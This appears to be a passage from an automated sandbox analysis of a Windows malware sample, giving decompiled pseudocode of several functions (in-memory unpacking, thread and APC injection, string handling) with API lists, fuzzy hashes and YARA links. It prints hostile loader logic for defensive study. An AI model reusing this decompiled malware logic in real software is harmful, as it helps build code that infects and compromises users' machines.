				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E02CE59A4();
				if(_t21 != 0) {
					_t59 =  *0x2ced25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2ced25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2ced160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02CE2B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2ced2a8; // 0xeba5a8
					if( *0x2ced25c > 5) {
						_t8 = _t26 + 0x2cee5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2cee9f5; // 0x44283a44
						_t27 = _t7;
					}
					E02CE9154(_t27, _t27);
					_t31 = E02CE8E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2ced270 =  *0x2ced270 ^ 0x81bbe65d;
						_t32 = E02CE1525(0x60);
						 *0x2ced32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2ced32c; // 0x3ba95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2ced32c; // 0x3ba95b0
							 *_t51 = 0x2cee81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2ced238, 0, 0x43);
							 *0x2ced2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2ced25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2ced2a8; // 0xeba5a8
								_t13 = _t58 + 0x2cee55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2cec287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02CE7A2E( ~_v8 &  *0x2ced270, 0x2ced00c); // executed
								_t42 = E02CE7FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02CE50E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02CE7C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E02CE46B2(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2ced15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02CE8B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x02ce2f70
0x02ce2f7b
0x02ce2f7e
0x02ce2f81
0x02ce2f84
0x02ce2f8b
0x02ce2f8d
0x02ce2f99
0x02ce2f9b
0x02ce2f9b
0x02ce2fa4
0x02ce2faa
0x02ce2faf
0x02ce2fc9
0x02ce2fd5
0x02ce2fd7
0x02ce2fdc
0x02ce2fe6
0x02ce2fe6
0x02ce2fde
0x02ce2fde
0x02ce2fde
0x02ce2fde
0x02ce2fed
0x02ce2ffa
0x02ce3001
0x02ce3006
0x02ce3006
0x02ce300e
0x02ce3011
0x02ce3037
0x02ce3043
0x02ce3048
0x02ce304d
0x02ce304f
0x02ce307b
0x02ce307d
0x02ce3051
0x02ce3055
0x02ce305a
0x02ce305f
0x02ce3066
0x02ce306c
0x02ce3071
0x02ce3077
0x02ce307e
0x02ce3080
0x02ce3082
0x02ce3091
0x02ce3097
0x02ce309c
0x02ce309e
0x02ce30ce
0x02ce30d0
0x02ce30a0
0x02ce30a0
0x02ce30a6
0x02ce30b3
0x02ce30b9
0x02ce30b9
0x02ce30c1
0x02ce30ca
0x02ce30d1
0x02ce30d3
0x02ce30d5
0x02ce30dc
0x02ce30e9
0x02ce30ee
0x02ce30f3
0x02ce30f5
0x02ce30f7
0x00000000
0x00000000
0x02ce30f9
0x02ce30fe
0x02ce3100
0x02ce3107
0x02ce310b
0x02ce310e
0x02ce3123
0x02ce3127
0x02ce312c
0x00000000
0x02ce312c
0x02ce3110
0x02ce3112
0x00000000
0x00000000
0x02ce3118
0x02ce311d
0x02ce311f
0x02ce3121
0x00000000
0x00000000
0x00000000
0x02ce3121
0x02ce3104
0x02ce3104
0x02ce30d5
0x02ce3013
0x02ce3013
0x02ce3018
0x02ce312e
0x02ce3132
0x02ce313a
0x02ce313a
0x00000000
0x02ce3132
0x02ce301e
0x02ce3021
0x02ce302b
0x02ce3032
0x00000000
0x02ce3142
0x02ce3142
0x02ce3146
0x02ce314a
0x02ce314a

APIs

Part of subcall function 02CE59A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,02CE2F89,00000000,00000000), ref: 02CE59B3

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02CE3006

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

memset.NTDLL ref: 02CE3055
RtlInitializeCriticalSection.NTDLL(03BA9570), ref: 02CE3066

Part of subcall function 02CE46B2: memset.NTDLL ref: 02CE46C7
Part of subcall function 02CE46B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02CE4709
Part of subcall function 02CE46B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02CE4714

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02CE3091
wsprintfA.USER32 ref: 02CE30C1

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 52fc085a7302f85f3bfbae058053295644ecb84466d499223073f876e84619c3
Instruction ID: c2cf175b102e981d9375dd03dc4735591433d2247e034925b5d809884b3ac243
Opcode Fuzzy Hash: 52fc085a7302f85f3bfbae058053295644ecb84466d499223073f876e84619c3
Instruction Fuzzy Hash: 99512271E40264EBCF21ABB1DC88F7E77BDAB84714F0009A9E503DB140E771AA44DB91

Uniqueness

Uniqueness Score: -1.00%

Function 02CE2D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E02CE2D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02CE1525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02CE8B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02CE1525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2ced278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02ce2d7b
0x02ce2d82
0x02ce2d87
0x02ce2d8a
0x02ce2d91
0x02ce2d94
0x02ce2d97
0x02ce2d9c
0x02ce2da1
0x02ce2ef5
0x02ce2ef7
0x02ce2ef9
0x02ce2efe
0x02ce2efe
0x02ce2da7
0x02ce2daa
0x02ce2dad
0x02ce2daf
0x02ce2daf
0x02ce2db3
0x00000000
0x00000000
0x02ce2db7
0x02ce2de3
0x02ce2de8
0x02ce2dea
0x02ce2dea
0x02ce2ded
0x02ce2df0
0x02ce2df0
0x02ce2df2
0x00000000
0x02ce2dbd
0x02ce2dbf
0x02ce2dde
0x02ce2dde
0x02ce2df5
0x02ce2df5
0x02ce2df6
0x02ce2df6
0x02ce2df9
0x00000000
0x00000000
0x00000000
0x02ce2df9
0x02ce2dc3
0x02ce2e0a
0x02ce2e0e
0x02ce2ee8
0x02ce2eea
0x02ce2eea
0x02ce2eeb
0x02ce2eee
0x00000000
0x02ce2eee
0x02ce2e17
0x02ce2e28
0x02ce2e2c
0x02ce2ee4
0x00000000
0x02ce2ee4
0x02ce2e32
0x02ce2e35
0x02ce2e39
0x02ce2e3d
0x02ce2e42
0x02ce2eda
0x02ce2eda
0x00000000
0x02ce2ee0
0x02ce2e4d
0x02ce2e56
0x02ce2e6a
0x02ce2e71
0x02ce2e86
0x02ce2e8c
0x02ce2e94
0x00000000
0x00000000
0x00000000
0x00000000
0x02ce2e96
0x02ce2e96
0x02ce2e96
0x02ce2e9d
0x02ce2ea5
0x00000000
0x00000000
0x02ce2ea7
0x02ce2eb0
0x00000000
0x00000000
0x00000000
0x02ce2eb2
0x02ce2eb4
0x02ce2eb7
0x02ce2eb7
0x02ce2eba
0x02ce2ebe
0x02ce2ec1
0x02ce2ec7
0x02ce2eca
0x02ce2ed1
0x00000000
0x02ce2e4d
0x02ce2dc8
0x02ce2dd0
0x02ce2dd6
0x02ce2dd8
0x02ce2dd8
0x02ce2ddb
0x02ce2ddd
0x00000000
0x02ce2ddd
0x02ce2db7
0x02ce2dfd
0x02ce2e02
0x02ce2e04
0x02ce2e04
0x02ce2e07
0x02ce2e07
0x00000000

APIs

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

lstrcpy.KERNEL32(69B25F45,00000020), ref: 02CE2E71
lstrcat.KERNEL32(69B25F45,00000020), ref: 02CE2E86
lstrcmp.KERNEL32(00000000,69B25F45), ref: 02CE2E9D
lstrlen.KERNEL32(69B25F45), ref: 02CE2EC1

Strings

, xrefs: 02CE2E0A

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: d1fa2a1bc97dccf633c3419cc199546317052039c1920a41d53ac437ffddebbc
Instruction ID: c73e2a764e8c10fe3a0f4b4990f9bc5467ffc74d82de6f8aa6c1681fa4c86b4c
Opcode Fuzzy Hash: d1fa2a1bc97dccf633c3419cc199546317052039c1920a41d53ac437ffddebbc
Instruction Fuzzy Hash: A951D471A00118EBDF20DF99C884BADBBBAFF85315F04815BED16AB201C7709B51CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001A1D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x1a30e0 = _t1;
				if(_t1 != 0) {
					 *0x1a30f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E001A19A0(); // executed
					_t6 = _t4;
					HeapDestroy( *0x1a30e0);
				}
				ExitProcess(_t6);
			}

0x001a1d39
0x001a1d42
0x001a1d48
0x001a1d4f
0x001a1d58
0x001a1d5d
0x001a1d63
0x001a1d6e
0x001a1d70
0x001a1d70
0x001a1d77

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 001A1D42
GetModuleHandleA.KERNEL32(00000000), ref: 001A1D52
GetCommandLineW.KERNEL32 ref: 001A1D5D

Part of subcall function 001A19A0: NtQuerySystemInformation.NTDLL ref: 001A19DF
Part of subcall function 001A19A0: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 001A1A26
Part of subcall function 001A19A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 001A1A55
Part of subcall function 001A19A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 001A1A73
Part of subcall function 001A19A0: CreateThread.KERNEL32 ref: 001A1A9D
Part of subcall function 001A19A0: QueueUserAPC.KERNEL32(001A13C4,00000000,?,?,00000000), ref: 001A1AB9

HeapDestroy.KERNEL32 ref: 001A1D70
ExitProcess.KERNEL32 ref: 001A1D77

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
String ID:
API String ID: 2501132232-0
Opcode ID: 050c182c3e20613d052943fc22e3a82432ce6339646cb952efeb55270e33e1e1
Instruction ID: ca5a31485418891b9eadd57204d063abd165d8687a8319ef24d13802dac0953f
Opcode Fuzzy Hash: 050c182c3e20613d052943fc22e3a82432ce6339646cb952efeb55270e33e1e1
Instruction Fuzzy Hash: 7AE0BD79902620ABC7212F75AE0DB4B7E64BF07791B240515F816E2A20DB380A81CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 02CE8A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02CE8A76
SysAllocString.OLEAUT32(02CE4BD8), ref: 02CE8ABA
SysFreeString.OLEAUT32(00000000), ref: 02CE8ACE
SysFreeString.OLEAUT32(00000000), ref: 02CE8ADC

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 7a6702a4aeb6d9c113a4a9121dde5c9248ce54fa2c6c256c203c8dfc233530d5
Instruction ID: 955322711d5e5eafeb9afbffa20c727de1aec86d38d8325384a1c283b05d2c39
Opcode Fuzzy Hash: 7a6702a4aeb6d9c113a4a9121dde5c9248ce54fa2c6c256c203c8dfc233530d5
Instruction Fuzzy Hash: 0D310A72940209EFCF04DF98D8C09AE7BB9FF48354B21892EF5069B260D7309A81CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001A14AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E001A14AD(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x1a30f0;
				_t46 = E001A1B54(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x1a3100;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x1a41a7; // 0x1a41a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E001A1B1C(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x1a3100 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x001a14b4
0x001a14c4
0x001a14c9
0x001a14ce
0x001a14e3
0x001a14ea
0x001a14ef
0x001a1500
0x001a1503
0x001a1509
0x001a150e
0x001a15c1
0x001a1514
0x001a1514
0x001a151a
0x001a1589
0x001a151c
0x001a151c
0x001a151f
0x001a1521
0x001a1529
0x001a152c
0x001a152f
0x001a1537
0x001a1542
0x001a1543
0x001a1544
0x001a1561
0x001a156f
0x001a1576
0x001a1579
0x001a157c
0x001a1584
0x00000000
0x00000000
0x001a1534
0x001a1534
0x001a1586
0x001a1593
0x001a15a8
0x001a1595
0x001a159e
0x001a15a3
0x001a15b9
0x001a15b9
0x001a15c8
0x001a15ce

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,001A1A1F,00000000), ref: 001A1503
memcpy.NTDLL(?,001A1A1F,?,?,?,?,?,?,?,001A1A1F,00000000,00000030,?,00000000), ref: 001A159E
VirtualFree.KERNELBASE(001A1A1F,00000000,00008000,?,?,?,?,?,?,001A1A1F,00000000), ref: 001A15B9

Strings

Sep 21 2021, xrefs: 001A153A

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 21 2021
API String ID: 4010158826-1195158264
Opcode ID: 2da5034f3eb985e95ee4aee3ed82f9938baee8fa885b897c80e1c5653b910d34
Instruction ID: 28f91304a7ca170c2abe26333712dbc3ed029c21814ba804aa5b298128a7fd32
Opcode Fuzzy Hash: 2da5034f3eb985e95ee4aee3ed82f9938baee8fa885b897c80e1c5653b910d34
Instruction Fuzzy Hash: 61318F75E00219EFCB00CF98D981BEEBBB8FF4A304F104169E916BB240D771AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02CE1128, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E02CE1128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x2ced32c; // 0x3ba95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2ced32c; // 0x3ba95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x2ced030) {
					HeapFree( *0x2ced238, 0, _t8);
				}
				_t9 = E02CE4A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x2ced32c; // 0x3ba95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x02ce1128
0x02ce1128
0x02ce1131
0x02ce1141
0x02ce1141
0x02ce1146
0x02ce114b
0x00000000
0x00000000
0x02ce113b
0x02ce113b
0x02ce114d
0x02ce1151
0x02ce1163
0x02ce1163
0x02ce116e
0x02ce1173
0x02ce1176
0x02ce117b
0x02ce117f
0x02ce1185

APIs

RtlEnterCriticalSection.NTDLL(03BA9570), ref: 02CE1131
Sleep.KERNEL32(0000000A,?,02CE30F3), ref: 02CE113B
HeapFree.KERNEL32(00000000,00000000,?,02CE30F3), ref: 02CE1163
RtlLeaveCriticalSection.NTDLL(03BA9570), ref: 02CE117F

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: f246e6408a89c8c25b9407a25ff073f13ac56d754157a54c40606c6e2707005c
Instruction ID: e16f629cfd999d1d2b8cd3f955ced9dc23117419157cca9124dd398259a56690
Opcode Fuzzy Hash: f246e6408a89c8c25b9407a25ff073f13ac56d754157a54c40606c6e2707005c
Instruction Fuzzy Hash: 16F0D471A80241DFDF249F69EC88B167BA8AB04780B088A05F90BCA261C771EE61DB55

Uniqueness

Uniqueness Score: -1.00%

Function 02CE5319, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE5319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02CE155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2ced2a8; // 0xeba5a8
				_t4 = _t24 + 0x2ceedc0; // 0x3ba9368
				_t5 = _t24 + 0x2ceed68; // 0x4f0053
				_t45 = E02CE5D79( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2ced2a8; // 0xeba5a8
						_t11 = _t32 + 0x2ceedb4; // 0x3ba935c
						_t48 = _t11;
						_t12 = _t32 + 0x2ceed68; // 0x4f0053
						_t52 = E02CE272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2ced2a8; // 0xeba5a8
							_t13 = _t35 + 0x2ceedfe; // 0x30314549
							if(E02CE5B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2ced25c - 6;
								if( *0x2ced25c <= 6) {
									_t42 =  *0x2ced2a8; // 0xeba5a8
									_t15 = _t42 + 0x2ceec0a; // 0x52384549
									E02CE5B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2ced2a8; // 0xeba5a8
							_t17 = _t38 + 0x2ceedf8; // 0x3ba93a0
							_t18 = _t38 + 0x2ceedd0; // 0x680043
							_t45 = E02CE4538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2ced238, 0, _t52);
						}
					}
					HeapFree( *0x2ced238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02CE4FF0(_t54);
				}
				return _t45;
			}

0x02ce5319
0x02ce5329
0x02ce532c
0x02ce5333
0x02ce5335
0x02ce5335
0x02ce5338
0x02ce533d
0x02ce5344
0x02ce5356
0x02ce535a
0x02ce5368
0x02ce5376
0x02ce537a
0x02ce540b
0x02ce540b
0x02ce5380
0x02ce5380
0x02ce5385
0x02ce5385
0x02ce538c
0x02ce5398
0x02ce539a
0x02ce539c
0x02ce539e
0x02ce53a5
0x02ce53b7
0x02ce53b9
0x02ce53c0
0x02ce53c2
0x02ce53c9
0x02ce53d4
0x02ce53d4
0x02ce53c0
0x02ce53d9
0x02ce53de
0x02ce53e5
0x02ce5403
0x02ce5405
0x02ce5405
0x02ce539c
0x02ce5417
0x02ce5417
0x02ce5419
0x02ce541e
0x02ce5420
0x02ce5420
0x02ce542b

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03BA9368,00000000,?,76D7F710,00000000,76D7F730), ref: 02CE5368
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03BA93A0,?,00000000,30314549,00000014,004F0053,03BA935C), ref: 02CE5405
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02CE7CCB), ref: 02CE5417

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7123165971555ca0b1d31fdea2f05aef0004118c95558be0bff4cee12ab4475d
Instruction ID: e531a80a2b64759c4e7a06b542d2d1dae3e95993f81b1ce427e6aeb924f879a4
Opcode Fuzzy Hash: 7123165971555ca0b1d31fdea2f05aef0004118c95558be0bff4cee12ab4475d
Instruction Fuzzy Hash: FC319C72940108FFDF21EB94DC84E9EBBBDEF84798F1202A5E602AB060D7709B54DB51

Uniqueness

Uniqueness Score: -1.00%

Function 001A1BAE, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule
